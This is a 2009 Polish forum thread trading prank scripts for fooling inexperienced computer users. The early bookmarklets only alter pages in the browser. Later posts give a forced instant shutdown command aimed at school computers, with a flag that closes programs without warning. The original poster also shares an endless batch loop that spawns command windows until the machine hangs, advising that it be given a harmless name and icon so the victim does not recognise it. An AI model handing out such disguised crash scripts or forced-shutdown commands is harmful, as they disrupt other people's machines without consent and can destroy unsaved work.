Javascript + przeglądarka = ciekawy wkręt dla internauty.

Czyli miejsce, w którym można poruszać tematy nie dające przyporządkować się do pozostałych działów ale uwaga tutaj również obowiązują przyjęte zasady na forum
ODPOWIEDZ
elemaniac
Użytkownik
Kontakt:

Javascript + przeglądarka = ciekawy wkręt dla internauty.

Post autor: elemaniac » 16 kwie 2009, 17:26

Witam.
Jak zrobić kawał mało doświadczonemu internaucie np. młodszemu rodzeństwu?
Prosto :mrgreen:
Wystarczą trzy kroki:
1. Usunięcie adresu strony i wpisanie kodu:

Kod: Zaznacz cały

javascript: document.body.contentEditable = 'true'; document.designMode='on'; void 0 
2. Potwierdzenie Enter`em.
3. (dowolna) Edycja strony.
Można bawić się na wszelkie możliwe sposoby - edycja przypomina tworzenie dokumentu w np. OpenOffice czy Wordzie, a zabawa jest przy tym przednia. Edycja przebiega TYLKO i wyłącznie wewnątrz przeglądarki tzn., że jeśli klikniemy "odśwież" powróci stara strona (i dobrze).
Jednak przeróbki można udokumentować czy to w postaci całego pliku .html zapisanego na dysku czy screenu. Mile widziane opisy własnych przeróbek :wink:

Awatar użytkownika
Ertew
Użytkownik
Kontakt:

Post autor: Ertew » 16 kwie 2009, 18:12

Spóźniłeś się o 15 dni, bo wtedy był 1 kwietnia.

Jeśli ,,ofiara'' oglądała na stronie więcej zdjęć (jakaś galeria), to można w czasie jej chwilowej nieobecności wpisać kod:

javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.getElementsByTagName("img"); DIL=DI.length; function A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.left=(Math.sin(R*x1+i*x2+x3)*x4+x5)+ "px"; DIS.top=(Math.cos(R*y1+i*y2+y3)*y4+y5)+" px"}R++}setInterval( 'A()',5); void(0);

A jak wróci i dotknie myszki, to przypadkiem nacisnąć enter.

elemaniac
Użytkownik
Kontakt:

Post autor: elemaniac » 17 kwie 2009, 16:26

Nie, nie... nie chodziło mi o żart primaaprilisowy :smile:
Tak po prostu :roll:
A ten skrypt znam bardzo dobrze, wielokrotnie przeze mnie wykorzystywany.
PS : Zachęcam do dzielenia się pomysłami na "udawaną edycję".

Awatar użytkownika
olo16
Użytkownik

Post autor: olo16 » 18 kwie 2009, 8:57

Niezłe. Ten drugi skrypt szczególnie mnie rozbawił :mrgreen: .

Awatar użytkownika
Kulpina
Użytkownik
Kontakt:

Post autor: Kulpina » 20 kwie 2009, 13:48

Ja i tak lubie wpisywane przez start uruchom polecenie:
shutdown -s -t 0 -c "adam tu byl"

:mrgreen: w szkole mało kto wie jak to wyłączyć, chociaż spotkałem kompy w których to sie zawieszało... nie wiem czy jakis antywirus blokował, czy wirus tak zapchał :mrgreen:

Awatar użytkownika
olo16
Użytkownik

Post autor: olo16 » 20 kwie 2009, 18:36

Kulpina, ale żeby aż kompy wyłączać... No chyba że w szkole, to rozumiem :mrgreen: . Jak to wyłączyć?

shutdown -a
No chyba że ustawisz czas na 0, to wtedy raczej nie ma czasu na anulowanie tego. I do tego co napisałeś można jeszcze dodać -f (wymusza zamknięcie programów bez ostrzerzenia)

elemaniac
Użytkownik
Kontakt:

Post autor: elemaniac » 20 kwie 2009, 18:43

To ja ze swojej strony polecam ten kod:

@echo off
:idz
Start cmd.exe
goto idz
Napisać go można choćby w notatniku i zapisać jako plik z rozszerzeniem *.bat - tytuł może nosić dowolną oczywiście nazwę np. "Dane" najlepiej jest zmienić ikonę na inną, by niezorientowana osoba nie wiedziała, że to nasz "wirus".
W tym wypadku jest to niekończąca się pętla, która ciągle uruchamia cmd.exe (wiersz poleceń). Zawiecha 100% i nawet nie trzeba długo czekać, bo okienka zapełniają ekran w zastraszającym tempie. Jedynie twardy reset może pomóc (wiem, bo sam testowałem - chyba, że o czymś jeszcze nie wiem).
PS : Nie chwaląc się jest to moje własne dzieło, które powstało z nudów i nigdzie jak dotąd nie było publikowane. Licencja GNU :lol:

pawel1991
-
Kontakt:

Post autor: pawel1991 » 20 kwie 2009, 21:03

Sprawdziłem to na wirtualnej maszynie. I muszę przyznać że jestem pod wrażeniem efektu, mimo prostoty. Jednak po otwarciu 180 okien wyskoczył błąd i program przestał działać.

Awatar użytkownika
Kulpina
Użytkownik
Kontakt:

Post autor: Kulpina » 20 kwie 2009, 22:18

Byc moze to z powodu wirtualnej maszyny ;) ja pamietam jak sie takim czymś bawiłem to sobie czasami włączyłem przez pomyłkę i potem zeby nie resetowac kompa, bo stary włączał się wieki była walka, zeby zdążyć tą zatrzymać :mrgreen: Nie pamiętam dokładnie, robiło się to chyba włączeniem notatnika, nabazgraniem i kliknieceim wyłącz komputer. Świetna metoda jak chce sie wybic sporo słabych procesów, niestety na viscie chyba już nie działa z tego co pamietam... Słabych tzn. takich które się nie blokują jak antyvir, wirusy pewnie też się nie dadzą, ale jakieś wpychające sie do autostartu bzdury np w szkolnych kompach idealne :mrgreen: Czystka taka, że czasami tylko głośnik zostaje w trayu <lol2> A system na koncu sie pyta czy chcesz zapisac zmiany to klikasz anuluj i zatrzymywanie się wyłącza ^^

elemaniac
Użytkownik
Kontakt:

Post autor: elemaniac » 21 kwie 2009, 19:38

Zawsze zamiast mało "zjadającego" RAM Wiersza poleceń można tym sposobem uruchomić coś bardziej wymagającego jak np. Firefox i to powinno przyśpieszyć nieco zawieszenie się PCta :wink:
Jak uruchomiłem to pierwszy raz też się zaskoczyłem, że coś tak prostego może być tak skuteczne.
Program otworzyłem "na gołą klatę" czyli bezpośrednio w systemie, bez maszyny wirtualnej. Po pewnym (krótkim) czasie przy moich 512MB jak wyżej wspominałem potrzebny był reset - tego nie było czasu powstrzymać, bo zanim uruchomił się menedżer zadań wyskoczyło 200 okien, a i ten został prędko zakopany przez nowe okna :smile:

Awatar użytkownika
olo16
Użytkownik

Post autor: olo16 » 21 kwie 2009, 19:51

Kulpina pisze:robiło się to chyba włączeniem notatnika, nabazgraniem i kliknieceim wyłącz komputer. [...] A system na koncu sie pyta czy chcesz zapisac zmiany to klikasz anuluj i zatrzymywanie się wyłącza ^^
Serio to działa? Muszę sprawdzić.

[ Dodano: 2009-04-21, 22:02 ]
To naprawdę działa!

ODPOWIEDZ